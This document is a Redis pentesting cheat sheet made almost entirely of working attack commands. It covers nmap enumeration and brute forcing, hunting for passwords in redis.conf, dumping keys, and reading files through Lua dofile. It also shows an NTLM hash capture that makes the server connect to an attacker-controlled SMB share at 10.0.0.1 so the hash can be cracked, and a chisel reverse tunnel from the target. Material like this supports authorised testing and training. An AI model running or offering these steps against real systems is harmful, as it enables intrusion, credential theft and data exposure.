Redis Pentesting
Last modified: 2023-02-05
Redis is the In-Memory Database. A default port is 6379.
Enumeration
nmap --script redis-info -p 6379 <target-ip>
nmap --script redis-brute -p 6379 <target-ip>
msf> use auxiliary/scanner/redis/redis_server
Check Config File
If we have access to target system, find the configuration file then we may be able to get passwords.
find / -name "redis.conf" 2>/dev/null
grep -i pass /path/to/redis.conf
If we get the line with password written as below,
requirepass "password"
We can set the password in a redis client.
> auth "password"
Connect
redis-cli -h <target-ip> -p 6379
# with password
redis-cli -h <target-ip> -p 6379 -a password
After connecting and execute the first arbitrary command, we may got the following output.
NOAUTH Authentication required.
If so, we need to authenticate to communicate with the redis server.
> auth <password>
# or
> auth default <password>
# or
> auth <username> <password>
Commands
# Check credentials
> auth <username> <password>
> auth default <password>
# Set a password temporary until the service restarts.
> config set requirepass <password>
# Information on the Redis server
> info
> info keyspace
# List all
> config get *
# List all databases
> config get databases
# Select the database ('select <index>')
> select 0
> select 1
> select 12
# Read files and directories using Lua scripts
> eval "dofile('C:\\\\Users\\\\Administrator\\\\Desktop\\\\user.txt')" 0
> eval "dofile('C:\\\\Users\\\\<username>\\\\Desktop\\\\user.txt')" 0
Get a Key Value
First find all keys.
> keys *
Before getting key values, we need to determine the type of key value by “type” command.
# Get the type of value
> type <key_name>
When we get the type, we can get the value of the key as below.
# type: string
> get <key_name>
# type: hash
> hget <key_name>
> hmget <key_name>
> hgetall <key_name>
# type: lists
> lrange <key_name> <start> <stop>
# e.g.
> lrange "userlist" 0 0
> lrange "userlist" 0 5
# type: sets
> smembers <key_name>
# type: sorted sets
> zrangebyscore <key_name> <min> <max>
# type: stream
> xread count <count> streams <key_name> <id>
NTLM Hash Disclosure
In local machine, start SMB server.
mkdir share
sudo impacket-smbserver share ./share/ -smb2support
Now execute the following command in Redis client.
> eval "dofile('//10.0.0.1/share')" 0
We might get a NTLM hash in the incoming connection to the SMB server. We can see the SMB server logs in terminal.
If the NTLM hash found, crack it.
Port Forwarding Redis Server to Local Machine
In local machine,
chisel server -p 9001 --reverse
In target machine,
./chisel client <local-ip>:9001 R:6379:127.0.0.1:6379